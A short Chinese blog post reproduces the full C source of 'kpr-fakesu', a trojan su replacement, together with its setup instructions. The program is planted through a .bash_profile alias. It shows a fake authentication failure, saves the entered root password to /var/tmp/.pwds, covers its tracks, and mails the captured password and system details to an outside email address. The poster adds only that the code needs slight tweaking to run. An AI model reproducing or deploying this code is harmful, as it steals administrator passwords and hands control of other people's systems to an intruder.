kpr-fakesu.c Linux su密码欺骗 源码

/* 
 * kpr-fakesu.c V0.9beta167 ;P
 * by koper <koper@linuxmail.org>
 *
 * Setting up:
 * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
 * admin@host:~$ mv .su /var/tmp/.su
 * admin@host:~$ cp .bash_profile .wgetrc
 * admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile
 * admin@host:~$ logout
 * *** LOGIN ***
 * admin@host:~$ su
 * Password: 
 * su: Authentication failure
 * Sorry.
 * admin@host:~$ su
 * Password: 
 * root@host:~# logout
 * admin@host:~$ cat /var/tmp/.pwds
 * root:dupcia17
 * admin@host:~$ 
 * 
 * /bin/su sends various failure information depending on the OS ver.
 * Please modify the source to make it "fit" ;)
 * 
 */

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[]){

FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];

sprintf(filex,"/var/tmp/.pwds");
sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/hiroot/.wgetrc /home/hiroot/.bash_profile");
if(argc==1) user="root";
if(argc==2) user=argv[1];
if(argc>2){
   if(strcmp(argv[1], "-l")==0)
     user=argv[2];
   else user=argv[1];}

fprintf(stdout,"Password: "); pass=getpass ("");
system("sleep 3");
fprintf(stdout,"su: Authentication failure.\n");

if ((fp=fopen(filex,"w")) != NULL)
  {
  fprintf(fp, "%s:%s\n", user, pass);
  fclose(fp);
  }

system(clean);
system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");

/* If you don't want password in your e-mail uncomment this line: */

system("uname -a >> /var/tmp/.pwds; cat /var/tmp/.pwds | mail hirootmail@qq.com");

}

代码要根据实际情况,稍微改下才能使用。

sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/hiroot/.wgetrc /home/hiroot/.bash_profile");

posted @ 2012-05-16 16:22  y0umer  阅读(523)  评论(0编辑  收藏  举报